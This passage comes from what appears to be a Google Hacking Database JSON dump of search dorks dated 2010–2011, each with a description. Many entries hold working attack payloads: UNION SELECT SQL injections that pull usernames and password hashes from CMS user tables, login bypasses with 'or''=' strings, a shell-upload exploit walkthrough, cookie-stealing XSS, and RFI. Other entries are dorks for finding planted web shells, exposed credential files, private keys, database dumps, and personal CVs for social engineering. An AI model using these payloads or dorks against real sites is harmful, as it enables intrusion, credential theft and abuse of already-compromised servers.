http://server/index.php?option=com_lqm&query=7&task=showResults&Itemid=158&lang=en&lqm_individual_id=-223+UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12+from+cil_site.jos_us", "submited": "2010-12-05", "request": "inurl:index.php?option=com_lqm \"showResults\"", "id": 3628}, {"short description": "intitle:PhpMyAdmin inurl:error.php", "long description": "intitle:PhpMyAdmin inurl:error.php", "submited": "2010-12-06", "request": "PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification", "id": 3629}, {"short description": "inurl:page.php?intPageID=", "long description": "Submitter: Srblche SQL Injection: http://server/page.php?intPageID=[SQL]", "submited": "2010-12-06", "request": "inurl:page.php?intPageID=", "id": 3630}, {"short description": "inurl:configuration.php-dist", "long description": "locates the default configuration file of JOOMLA Author: ScOrPiOn", "submited": "2010-12-07", "request": "inurl:configuration.php-dist", "id": 3631}, {"short description": "inurl:\"config.php.new\" +vbulletin", "long description": "locates the default configuration file for vBulletin (/includes/config.php.new) Author: MaXe", "submited": "2010-12-07", "request": "inurl:\"config.php.new\" +vbulletin", "id": 3632}, {"short description": "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"", "id": 3633}, {"short description": "\"r57shell 1.4\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"r57shell 1.4\"", "id": 3634}, {"short description": "\"r57shell\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"r57shell\"", "id": 3635}, {"short description": "\"Powered by SOOP Portal Raven 1.0b\"", "long description": "Submitter: Sun Army - 
http://www.exploit-db.com/exploits/15703", "submited": "2010-12-07", "request": "\"Powered by SOOP Portal Raven 1.0b\"", "id": 3636}, {"short description": "\"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *\"", "long description": "Locates r57 web shells Author: ScOrPiOn", "submited": "2010-12-07", "request": "\"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *\"", "id": 3637}, {"short description": "\"plugins/wp-db-backup/wp-db-backup.php\"", "long description": "Many of the results of the search show error logs which give an attacker the server side paths including the home directory name. This name is often also used for the login to ftp and shell access, which exposes the system to attack. Author: ScOrPiOn", "submited": "2010-12-08", "request": "\"plugins/wp-db-backup/wp-db-backup.php\"", "id": 3638}, {"short description": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "long description": "Locates c99 web shells Author: ScOrPiOn", "submited": "2010-12-08", "request": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "id": 3639}, {"short description": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "long description": "Locates CGI-Telnet web shells. Author: ScOrPiOn", "submited": "2010-12-09", "request": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "id": 3640}, {"short description": "inurl:phpinfo.php", "long description": "Locates phpinfo files. A phpinfo file Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment , the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License. 
Author: ScOrPiOn", "submited": "2010-12-10", "request": "inurl:phpinfo.php", "id": 3641}, {"short description": "inurl:/vb/install/install.php", "long description": "Vbulletin installation wizards, allow users to modify installation parameters. May also reveal sql username, password and table installations. Author: ScOrPiOn", "submited": "2010-12-10", "request": "inurl:/vb/install/install.php", "id": 3642}, {"short description": "inurl:/vb/install/upgrade.php", "long description": "Vbulletin custom updrade wizards. Author: ScOrPiOn", "submited": "2010-12-10", "request": "inurl:/vb/install/upgrade.php", "id": 3643}, {"short description": "inurl:com_amresurrected", "long description": "Submitter: Bl4ck.Viper SQL Injection: index.php?option=com_amresurrected&Itemid=[Sqli]", "submited": "2010-12-10", "request": "inurl:com_amresurrected", "id": 3644}, {"short description": "allinurl:/xampp/security.php", "long description": "XAMPP Security Setting Page Information Disclosure. Author: modpr0be", "submited": "2010-12-13", "request": "allinurl:/xampp/security.php", "id": 3645}, {"short description": "inurl:panorama-viewer.php?id=", "long description": "[-]http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--[-] http://server/adm/users.php[-] http://server/adm/panorama_edit.php?id=1[-] http://server/listimages/shell.php#################################################################Great 2 : : h4m1d /sheisebaboo / vc.emliter / Neo / H-SK33PY / Net.Editor /HUrr!c4nE / Cair3x /novin security team and all iranian hackers#################################################################", "submited": "2010-12-14", "request": "inurl:panorama-viewer.php?id=", "id": 3646}, {"short description": "inurl:showcat.asp?id=", "long description": "========================================Centralia (admin/dbedit.asp?) 
Bypass and Shell Upload Vulnerability========================================################################################################## Exploit : Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability# Date : 10 December 2010# Author : ali.erroor# Version : n/a# Googel DorK : inurl:showcat.asp?id=# Home : www.network-security.ir# Email : ali.erroor@att.net#################################################################[+] Exploit[1] Centralia (admin/dbedit.asp?) Bypass and File Upload Vulnerability..[-] http://localhost/path/admin/dbedit.asp?table=products[-] username : 'or''='[-] password : 'or''='[2] Create New Upload Your Shell.Asp ..[-] http://localhost/path/admin/dbedit.asp?a=upload_init[3] To See Shell Edit Your uploads[-] http://localhost/path/uploads/shell;asp.jpg[+] Demo[-] http://server/admin/dbedit.asp?table=products[-] http://server/admin/dbedit.asp?a=upload_init#################################################################Great 2 : : h4m1d /sheisebaboo / vc.emliter / H-SK33PY / Net.Editor / HUrr!c4nE/ Cair3x /novin security team and all iranian hackers#################################################################", "submited": "2010-12-14", "request": "inurl:showcat.asp?id=", "id": 3647}, {"short description": "\"POWERED BY: WEBINSPIRE\"", "long description": "Author: ghost-dz SQL Injection: http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--", "submited": "2010-12-14", "request": "\"POWERED BY: WEBINSPIRE\"", "id": 3648}, {"short description": "\"powered by simpleview CMS\"", "long description": "Author: Sun Army XSS: /search/?searchString=\">alert(document.cookie)&submitSearch.x=17&submitSearch.y=13", "submited": "2010-12-15", "request": "\"powered by simpleview CMS\"", "id": 3649}, {"short description": "\"Powered By PageAdmin CMS Free Version\"", "long description": "Author: Sun Army XSS: /include/search.aspx?keycode=\">xss ByTakpar&type=1&language=en", 
"submited": "2010-12-15", "request": "\"Powered By PageAdmin CMS Free Version\"", "id": 3650}, {"short description": "intext: Copyright+MantisBT Group", "long description": "Mantis Bug Trackerhttp://mantisbt.orghttp://www.exploit-db.com/exploits/15735http://www.exploit-db.com/exploits/15736Thanks,*Gjoko 'LiquidWorm' Krstic**Information Security Engineer****Zero Science Lab*Macedonian Information Security Research & Development Laboratoryhttp://www.zeroscience.mk+389 (0) 75 290 926+389 (0) 77 670 886", "submited": "2010-12-15", "request": "intext: Copyright+MantisBT Group", "id": 3651}, {"short description": "inurl:\"produtos.asp?produto=\"", "long description": "Submitter: Br0ly http://www.exploit-db.com/exploits/15776", "submited": "2010-12-18", "request": "inurl:\"produtos.asp?produto=\"", "id": 3652}, {"short description": "inurl:com_jeauto", "long description": "LFI: http://www.exploit-db.com/exploits/15779", "submited": "2010-12-19", "request": "inurl:com_jeauto", "id": 3653}, {"short description": "\"Powered by: IRIran.net\"", "long description": "IRIran eShop Builder SQL Injection: http://server/patch/pages/index.php?id=0[SQL]Submitter: Ahoora", "submited": "2010-12-22", "request": "\"Powered by: IRIran.net\"", "id": 3654}, {"short description": "allinurl:index.php?db=information_schema", "long description": "Submitter: modpr0be phpMyAdmin Direct Access to information_schema Database", "submited": "2010-12-23", "request": "allinurl:index.php?db=information_schema", "id": 3655}, {"short description": "\"Powered by CubeCart 3.0.4\"", "long description": "CSRF:http://www.exploit-db.com/exploits/15822", "submited": "2010-12-24", "request": "\"Powered by CubeCart 3.0.4\"", "id": 3656}, {"short description": "\"Powered by KaiBB 1.0.1\"", "long description": "Multiple Vulnerabilities:http://www.exploit-db.com/exploits/15846/", "submited": "2010-12-29", "request": "\"Powered by KaiBB 1.0.1\"", "id": 3657}, {"short description": "\"Website Design by Rocktime\"", 
"long description": "Submitter: n0n0x http://server/product.php?fdProductId=[SQL Injection]", "submited": "2010-12-29", "request": "\"Website Design by Rocktime\"", "id": 3658}, {"short description": "\"Powered by UNO.com.my\"", "long description": "Submitter: SiKodoQ http://127.0.0.1/[path]/page.php?pid=[SQLi]", "submited": "2010-12-29", "request": "\"Powered by UNO.com.my\"", "id": 3659}, {"short description": "\"/index.php?id=cmp-noticias\"", "long description": "Submitter: xoron http://server/index.php?id=cmp-noticias&n=[SQLi]", "submited": "2010-12-29", "request": "\"/index.php?id=cmp-noticias\"", "id": 3660}, {"short description": "inurl:\"/gadmin/index.php\"", "long description": "Author: AtT4CKxT3rR0r1ST SQL Injection: www.site.com/gallery.php?id=null[Sql Injection]", "submited": "2011-01-02", "request": "inurl:\"/gadmin/index.php\"", "id": 3661}, {"short description": "\"Powered by YourTube v1.0\"", "long description": "Author: AtT4CKxT3rR0r1ST CSRF: http://www.exploit-db.com/exploits/15892", "submited": "2011-01-02", "request": "\"Powered by YourTube v1.0\"", "id": 3662}, {"short description": "inurl:\"com_eventcal\"", "long description": "Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] RFI: www.site.com/components/com_eventcal/eventcal.php?mosConfig_absolute_path=[shell.txt?]", "submited": "2011-01-02", "request": "inurl:\"com_eventcal\"", "id": 3663}, {"short description": "\"POWERED BY ALITALK\"", "long description": "intext:\"POWERED BY ALITALK\"", "submited": "2011-01-04", "request": "\"POWERED BY ALITALK\"", "id": 3665}, {"short description": "\"Powered by phpMySport\"", "long description": "intext:\"Powered by phpMySport\" Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15921/", "submited": "2011-01-06", "request": "\"Powered by phpMySport\"", "id": 3666}, {"short description": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "long description": "Author: DigiP Multiple 
Vulnerabilities: http://www.exploit-db.com/exploits/9296/", "submited": "2011-01-09", "request": "inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" OR inurl:\"jscripts/tiny_mce/plugins/tinybrowser/\" \"index of\"", "id": 3667}, {"short description": "allintext:\"fs-admin.php\"", "long description": "A foothold using allintext:\"fs-admin.php\" shows the world readabledirectories of a plug-in that enables Wordpress to be used as a forum. Manyof the results of the search also show error logs which give an attacker theserver side paths including the home directory name. This name is often alsoused for the login to ftp and shell access, which exposes the system toattack. There is also an undisclosed flaw in version 1.3 of the software, asthe author has mentioned in version 1.4 as a security fix, but does not tellus what it is that was patched.Author: DigiP", "submited": "2011-01-09", "request": "allintext:\"fs-admin.php\"", "id": 3668}, {"short description": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "long description": "Google search for web site build with symfony framework. This filecontains the login / password for the databasesAuthor: Simon Leblanc", "submited": "2011-01-09", "request": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "id": 3669}, {"short description": "inurl:web/frontend_dev.php -trunk", "long description": "Google search for web site build with symfony framework and indevelopment environment.In most case, you have a bar development on top of the web page. 
If yougo in config -> Settings, you can find login and password.if you replace web/frontend_dev.php by config/databases.yml in url, youcan find login / password for the databasesAuthor: Simon Leblanc", "submited": "2011-01-09", "request": "inurl:web/frontend_dev.php -trunk", "id": 3670}, {"short description": "\"TinyBB 2011 all rights reserved\"", "long description": "Submitter: Aodrulez SQL Injection: http://www.exploit-db.com/exploits/15961/", "submited": "2011-01-10", "request": "\"TinyBB 2011 all rights reserved\"", "id": 3671}, {"short description": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "long description": "Maximus CMS (FCKeditor) File Upload Vulnerabilityhttp://www.exploit-db.com/exploits/15960Author: eidelweiss", "submited": "2011-01-11", "request": "inurl:\"/modules.php?name=\" \"Maximus CMS\"", "id": 3672}, {"short description": "intext:\"Powered by DZOIC Handshakes Professional\"", "long description": "Author: IR-Security -TeamSQL injection: http://server/administrator/index.php?section=manage_members&action=edit_photo&pho_id=-100001 unionall select 1,version()--", "submited": "2011-01-20", "request": "intext:\"Powered by DZOIC Handshakes Professional\"", "id": 3675}, {"short description": "inurl:\"index.php?m=content+c=rss+catid=10\"", "long description": "Author: eidelweiss http://host/index.php?m=content&c=rss&catid=5\tshow MySQL Error (table)", "submited": "2011-01-21", "request": "inurl:\"index.php?m=content+c=rss+catid=10\"", "id": 3676}, {"short description": "\"inurl:cultbooking.php\"", "long description": "CultBooking Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16028/", "submited": "2011-01-22", "request": "\"inurl:cultbooking.php\"", "id": 3677}, {"short description": "inurl:\"/plugins/ImageManager/manager.php\"", "long description": "Author: PenetraDz Shell Upload Vuln: manager/media/editor/plugins/ImageManager/manager.php", "submited": "2011-01-22", "request": "inurl:\"/plugins/ImageManager/manager.php\"", "id": 
3678}, {"short description": "\"Powered by: PHP Link Directory\"", "long description": "CSRF Vuln: http://www.exploit-db.com/exploits/16037/", "submited": "2011-01-23", "request": "\"Powered by: PHP Link Directory\"", "id": 3679}, {"short description": "inurl:\"ab_fct.php?fct=\"", "long description": "Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16044", "submited": "2011-01-25", "request": "inurl:\"ab_fct.php?fct=\"", "id": 3680}, {"short description": "Photo Gallery powered by TinyWebGallery 1.8.3", "long description": "Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: http://www.exploit-db.com/exploits/16090", "submited": "2011-02-01", "request": "Photo Gallery powered by TinyWebGallery 1.8.3", "id": 3681}, {"short description": ":inurl:mj_wwwusr", "long description": "http://www.exploit-db.com/exploits/16103", "submited": "2011-02-03", "request": "http://www.google.com/#sclient=psy&hl=en&safe=off&site=&source=hp&q=:inurl%3Amj_wwwusr&aq=f&aqi=&aql=&oq=&pbx=1&fp=2dcb6979649afcb0", "id": 3682}, {"short description": "allintext: /qcodo/_devtools/codegen.php", "long description": "Information Disclosure: http://www.exploit-db.com/exploits/16116", "submited": "2011-02-05", "request": "allintext: /qcodo/_devtools/codegen.php", "id": 3683}, {"short description": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "long description": "SQL Injection: http://www.exploit-db.com/exploits/16122", "submited": "2011-02-06", "request": "\"Powered By Dew-NewPHPLinks v.2.1b\"", "id": 3684}, {"short description": "site:ebay.com inurl:callback", "long description": "Returns:http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?then:http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3ECan also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS through UTF7-BOM string injection to bypass IE8 XSS Filters", "submited": "2011-02-11", "request": "site:ebay.com inurl:callback", "id": 3685}, {"short 
description": "inurl:app/etc/local.xml", "long description": "Magento local.xml sensitive information disclosureAuthor: Rambaud Pierre", "submited": "2011-02-19", "request": "inurl:app/etc/local.xml", "id": 3686}, {"short description": "\"made visual by sightFACTORY\"", "long description": "Author : eXeSoul [#] http://server/accommodations.php?contentid=[sqli] [#] http://server/chamber_business.php?mid=[sqli] [#] http://server/work.php?mid=[sqli] [#] http://server/members.php?id=[SQLi]", "submited": "2011-02-23", "request": "\"made visual by sightFACTORY\"", "id": 3687}, {"short description": "\"powered by zipbox media\"", "long description": "Author:XaDaL http://site.com/album.php?id=[SQLi]", "submited": "2011-02-23", "request": "\"powered by zipbox media\"", "id": 3688}, {"short description": "intext:db_pass inurl:settings.ini", "long description": "Submitter: Bastich mysql.nimbit.com dashboard settings", "submited": "2011-02-24", "request": "intext:db_pass inurl:settings.ini", "id": 3689}, {"short description": "intitle:cyber anarchy shell", "long description": "Submitter: eXeSoul cyber anarchy shell", "submited": "2011-02-24", "request": "intitle:cyber anarchy shell", "id": 3690}, {"short description": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "long description": "Author :- eXeSoulYou will get lots of web shells even some private shells.", "submited": "2011-02-24", "request": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "id": 3691}, {"short description": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "long description": "Author : AtT4CKxT3rR0r1STSQL Injection: www.site.com/album.php?id=null[Sql]", "submited": "2011-03-05", "request": "\"POWERED BY ZIPBOX MEDIA\" inurl:\"album.php\"", "id": 3692}, {"short description": "\"Powered by SOFTMAN\"", "long description": "Author: eXeSoul[i] \"Powered by SOFTMAN\"[ii] \"Powered by Softman Multitech Pvt 
Ltd\"[iii] \"All Rights reserved by SOFTMAN\"Go To Admin Panel :-Admin: ' or 'x'='x Password: ' or 'x'='x", "submited": "2011-03-07", "request": "\"Powered by SOFTMAN\"", "id": 3693}, {"short description": "intext:\"Web Design by Webz\" filetype:asp", "long description": "Submitter: p0pc0rnhttp://site.com/xxx.asp?id=[SQL]http://site.com/xxx.asp?catID=[SQL]http://site.com/xxx.asp?brandID=[SQL]", "submited": "2011-03-08", "request": "intext:\"Web Design by Webz\" filetype:asp", "id": 3694}, {"short description": "intext:\"Powered by EZPub\"", "long description": "SQL Injection: http://www.exploit-db.com/exploits/16941", "submited": "2011-03-08", "request": "intext:\"Powered by EZPub\"", "id": 3695}, {"short description": "inurl:\"sitegenius/topic.php\"", "long description": "Submitter: dR.sqL SQL Injection: http://localhost/sitegenius/topic.php?id=[SQLi]", "submited": "2011-03-13", "request": "inurl:\"sitegenius/topic.php\"", "id": 3696}, {"short description": "\"POWERED BY LOG1 CMS\"", "long description": "Multiple Vulnerabilities: http://www.exploit-db.com/exploits/16969/", "submited": "2011-03-14", "request": "\"POWERED BY LOG1 CMS\"", "id": 3697}, {"short description": "ADAN (view.php ) Sql Injection Vulnerability", "long description": "SQL Injection: http://www.exploit-db.com/exploits/16276/", "submited": "2011-03-14", "request": "ADAN (view.php ) Sql Injection Vulnerability", "id": 3698}, {"short description": "intitle:\"cascade server\" inurl:login.act", "long description": "Search for login screen of default instance: Cascade Server CMS by Hannon Author: Erik Horton", "submited": "2011-03-15", "request": "intitle:\"cascade server\" inurl:login.act", "id": 3699}, {"short description": "intext:\"Site by Triware Technologies Inc\"", "long description": "Submitter: p0pc0rnSQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]", "submited": "2011-03-16", "request": "intext:\"Site by Triware 
Technologies Inc\"", "id": 3700}, {"short description": "intext:\"Powered by VoiceCMS\"", "long description": "Submitter: p0pc0rn SQL Injection: http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id] http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]", "submited": "2011-03-16", "request": "intext:\"Powered by VoiceCMS\"", "id": 3701}, {"short description": "intext:\"Powered by OnePlug CMS\"", "long description": "Sumitter: p0pc0rnSQL Injection: http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a", "submited": "2011-03-16", "request": "intext:\"Powered by OnePlug CMS\"", "id": 3702}, {"short description": "intitle:\"[EasyPHP] - Administration\"", "long description": "Unprotected EasyPHP Admin page detection.. Author: Aneesh Dogra (lionaneesh)", "submited": "2011-03-23", "request": "intitle:\"[EasyPHP] - Administration\"", "id": 3703}, {"short description": "intext:\"Powered by Inventory Mojo Software.\"", "long description": "Submitter: p0pc0rnSQL Injection (categoria.asp, producto.asp, srubro.asp, marca.asp, buscar.asp, Login.asp, NewUser.asp, do_addToNewsletter.asp)---http://site.com/categoria.asp?CT=6' and '1'='1 TRUE http://site.com/categoria.asp?CT=6' and '1'='0 FALSE", "submited": "2011-03-23", "request": "intext:\"Powered by Inventory Mojo Software.\"", "id": 3704}, {"short description": "\"site by Designscope\"", "long description": "Submitter: Net.Edit0rSQL Injection: http://127.0.0.1/general.php?pageID=[SQL] http://127.0.0.1/content.php?pageID=[SQL]", "submited": "2011-03-24", "request": "\"site by Designscope\"", "id": 3705}, {"short description": "index.php?option=com_ignitegallery", "long description": "Submitter: TiGeR_YeMeN HaCkErSQL Injection: index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users--", "submited": "2011-03-27", "request": "index.php?option=com_ignitegallery", "id": 3706}, {"short description": "intext:\"Powered by 
FXRecruiter\"", "long description": "Submitter: Ashiyane Digital Security TeamArbitrary File Upload: You must Register at site, Then in \"Upload CV Field\" Select and Upload Your File, then Using \"Live Http Header\" Change ur File Format To Etc Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File]", "submited": "2011-03-27", "request": "intext:\"Powered by FXRecruiter\"", "id": 3707}, {"short description": "inurl:\"fbconnect_action=myhome\"", "long description": "Submitter: z0mbyakSQL Injection: www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--", "submited": "2011-04-05", "request": "inurl:\"fbconnect_action=myhome\"", "id": 3708}, {"short description": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "long description": "full details dbname dbuser dbpass all plain textAuthor:Bastich", "submited": "2011-04-18", "request": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "id": 3709}, {"short description": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "long description": "Unreal Tournament config, plain text passwords Author: Bastich", "submited": "2011-04-18", "request": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "id": 3710}, {"short description": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "long description": "plain text passwods", "submited": "2011-04-18", "request": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "id": 3711}, {"short description": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "long description": "Total commander wxc_ftp.ini run has through John etc. 
or even better usehttp://wcxftp.org.ru/", "submited": "2011-04-18", "request": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "id": 3712}, {"short description": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "long description": "Asian FTP software -, run the password hash through John etc. Author: Bastich", "submited": "2011-04-18", "request": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "id": 3713}, {"short description": "\"error_log\" inurl:/wp-content", "long description": "Find various www readable Wordpress directories containing error logs withserver side debugging info, such as home path directory names, which areoften the same user names for logging into the server over FTP and SSH.This often exposes the path of the plug-ins installed in wordpress as well,giving someone more information and avenues of attack since many Wordpressplug-ins can lead to compromises of the sites security. - DigiP", "submited": "2011-05-03", "request": "\"error_log\" inurl:/wp-content", "id": 3714}, {"short description": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "long description": "Site: google.com/latitude - This is a free application where you can trackyour PC, laptop and mobile, just login there and you will be trackedfreely(used to track yourself live and you can put this in blogs to showwhere you are)I made a dork simply that shows some couple of people, after some years whenthis application will grow stronger and you can get tons of victims.*allinurl:http://www.google.co.in/latitude/apps/badge/api?user=*By *The ALLSTAR*", "submited": "2011-05-03", "request": "allinurl:http://www.google.co.in/latitude/apps/badge/api?user=", "id": 3715}, {"short description": "intitle:Locus7shell intext:\"Software:\"", "long description": "intitle:Locus7shell intext:\"Software:\"Submitted by lionaneesh--ThanksAneesh Dogra (lionaneesh)", "submited": "2011-05-03", "request": "intitle:Locus7shell intext:\"Software:\"", "id": 3716}, 
{"short description": "filetype:xls + password + inurl:.com", "long description": "The filetype:xls never changesWhat is inbtween then + sings can be what ever you are looking fortaxidssnpasswordStudent IDetcThe inurl: can be changed to what you want.gov.edu.cometc.Take care,RedShift", "submited": "2011-05-03", "request": "filetype:xls + password + inurl:.com", "id": 3717}, {"short description": "\"Login Name\" Repository Webtop intitle:login", "long description": "Search for login screen of default instance: Documentum Webtop by EMC", "submited": "2011-05-11", "request": "\"Login Name\" Repository Webtop intitle:login", "id": 3718}, {"short description": "intitle:\"Enabling Self-Service Procurement\"", "long description": "Search for login screen of default instance: Puridiom (A Procurement WebApplication)", "submited": "2011-05-11", "request": "intitle:\"Enabling Self-Service Procurement\"", "id": 3719}, {"short description": "intitle:\"cyber recruiter\" \"User ID\"", "long description": "Search for login screen of default instance: Cyber Recruiter (applicanttracking and recruiting software)", "submited": "2011-05-11", "request": "intitle:\"cyber recruiter\" \"User ID\"", "id": 3720}, {"short description": "inurl:sarg inurl:siteuser.html", "long description": "Submitter: pipefishSquid User Access Reports that show users' browsing history throughthe proxy. Shows internal IP space sometimes, usernames as well, and canbe helpful when planning a pen test (spear phishing\\social engineeringcampaign etc.) 
It also helps to ID an organization's proxy server.", "submited": "2011-05-26", "request": "inurl:sarg inurl:siteuser.html", "id": 3721}, {"short description": "vBulletin Install Page Detection", "long description": "inurl:/install/install.php intitle:vBulletin * Install SystemThis dork displays the untreated install.php pages!Auth0r: lionaneeshGreetz to :Team Indishell , INDIA , Aasim Shaikh ,", "submited": "2011-05-27", "request": "vBulletin Install Page Detection", "id": 3722}, {"short description": "ionCube Loader Wizard information disclosure", "long description": "inurl:loader-wizard ext:phpThis dork displays sensitive informationAuth0r: MaXe", "submited": "2011-05-28", "request": "ionCube Loader Wizard information disclosure", "id": 3723}, {"short description": "inurl:\"clsUploadtest.asp\"", "long description": "Submitter: KDGCrewhttp://www.site.com/clsUpload/clsUploadtest.asphttp://www.site.com/clsUpload/nameshell.php", "submited": "2011-06-14", "request": "inurl:\"clsUploadtest.asp\"", "id": 3724}, {"short description": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "long description": "PostgreSQL database dump with passwordsBastich", "submited": "2011-06-28", "request": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "id": 3725}, {"short description": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "long description": "MySQL database dump with passwordsBastich", "submited": "2011-06-28", "request": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "id": 3726}, {"short description": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "long description": "phpMyAdmin SQL dump with passwordsBastich", "submited": "2011-06-28", "request": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "id": 3727}, {"short description": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "long description": "Searches Dropbox for publicly avaliable PDF's 
containing information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack.Author: Trevor Starick", "submited": "2011-07-01", "request": "site:dl.dropbox.com filetype:pdf cv OR curriculum vitae OR resume", "id": 3728}, {"short description": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "long description": "Searches GoogleDocs for publicly avaliable PDF's containing information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack.--Trevor Starick", "submited": "2011-07-18", "request": "site:docs.google.com intitle:(cv Or resume OR curriculum vitae)", "id": 3729}, {"short description": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "long description": "Searches Mediafire for publicly avaliable PDF's containing information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack--Trevor Starick", "submited": "2011-07-18", "request": "site:mediafire.com cv Or resume OR curriculum vitae filetype:pdf OR doc", "id": 3730}, {"short description": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "long description": "Searches StashBox for publicly avaliable PDF's or .doc filescontaining information used ina CV/Resume/Curriculum Vitae which can therefore be used in a SocialEngineering based vector attack--Trevor Starick", "submited": "2011-07-18", "request": "site:stashbox.org cv Or resume OR curriculum vitae filetype:pdf OR doc", "id": 3731}, {"short description": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "long description": "iphone apple push notification system private keys, frequently unencrypted,frequently with DeviceIDs in same dir", "submited": "2011-07-18", "request": "inurl:/push/ .pem apns -\"push notifications\" \"bag attributes\"", "id": 3732}, {"short description": "inurl:server-info intitle:\"Server 
Information\" Apache Server Information", "long description": "Juicy information about the apache server installation in the website.--*Regards,Fady Mohammed Osman.*", "submited": "2011-07-26", "request": "inurl:server-info intitle:\"Server Information\" Apache Server Information", "id": 3733}, {"short description": "inurl:\":9000\" PacketVideo corporation", "long description": "inurl:\":9000\" PacketVideo corporationAbout: This provides Twonky Server Media interface. You can find images, music, videos etc.Submitter: Ishaan P", "submited": "2011-07-26", "request": "inurl:\":9000\" PacketVideo corporation", "id": 3734}, {"short description": "intitle:m1n1 1.01", "long description": "find the b374k shell....Submitted by : biLLbud", "submited": "2011-07-26", "request": "intitle:m1n1 1.01", "id": 3735}, {"short description": "filetype:pem \"Microsoft\"", "long description": "Microsoft private keys, frequently used for servers with UserID on the samepage.--Shamanoid", "submited": "2011-07-26", "request": "filetype:pem \"Microsoft\"", "id": 3736}, {"short description": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "long description": "vtiger CRM version 5.x presence--LiquidWorm", "submited": "2011-08-06", "request": "intitle:\"vtiger CRM 5 - Commercial Open Source CRM\"", "id": 3737}, {"short description": "allinurl:forcedownload.php?file=", "long description": "Didn't see this anywhere in the GHDB, but its been known for a while andwidely abused by others.Google Dork \"allinurl:forcedownload.php?file=\"Sites that use the forcedownload.php script are vulnerable to urlmanipulation, and will spit out any file on the local site, including thePHP files themselves with all server side 